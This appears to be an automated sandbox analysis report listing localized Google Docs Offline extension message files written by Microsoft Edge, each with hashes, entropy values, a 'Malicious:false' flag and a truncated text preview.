                                                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):1895
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.28990403715536
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                                                                                                                                                                                    MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                                                                                                                                                                                    SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                                                                                                                                                                                                    SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                                                                                                                                                                                    SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):1042
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.3945675025513955
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                                                                                                                                                                                    MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                                                                                                                                                                                                    SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                                                                                                                                                                                    SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                                                                                                                                                                                                    SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):2535
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.8479764584971368
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                                                                                                                                                                                    MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                                                                                                                                                                                    SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                                                                                                                                                                                                    SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                                                                                                                                                                                    SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):1028
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.797571191712988
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                                                                                                                                                                                    MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                                                                                                                                                                                                    SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                                                                                                                                                                                    SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                                                                                                                                                                                    SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):994
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.700308832360794
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                                                                                                                                                                                                    MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                                                                                                                                                                                                    SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                                                                                                                                                                                                                                                    SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                                                                                                                                                                                                    SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):2091
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.358252286391144
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                                                                                                                                                                                                                                                    MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                                                                                                                                                                                                    SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                                                                                                                                                                                                    SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                                                                                                                                                                                                    SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):2778
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                                                                                                                                                                                    MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                                                                                                                                                                                    SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                                                                                                                                                                                    SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                                                                                                                                                                                    SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):1719
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.287702203591075
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                                                                                                                                                                                    MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                                                                                                                                                                                    SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                                                                                                                                                                                    SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                                                                                                                                                                                    SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):936
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.457879437756106
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                                                                                                                                                                                    MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                                                                                                                                                                                    SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                                                                                                                                                                                    SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                                                                                                                                                                                    SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):3830
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                                                                                                                                                                    MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                                                                                                                                                                    SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                                                                                                                                                                    SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                                                                                                                                                                    SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):1898
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.187050294267571
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                                                                                                                                                                    MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                                                                                                                                                                    SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                                                                                                                                                                    SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                                                                                                                                                                    SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):914
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.513485418448461
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                                                                                                                                                                    MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                                                                                                                                                                    SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                                                                                                                                                                    SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                                                                                                                                                                    SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):878
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.4541485835627475
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                                                                                                                                                                    MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                                                                                                                                                                    SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                                                                                                                                                                    SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                                                                                                                                                                    SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):2766
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                                                                                                                                                                    MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                                                                                                                                                                    SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                                                                                                                                                                    SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                                                                                                                                                                    SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                                                                                                                                                                    Malicious:false
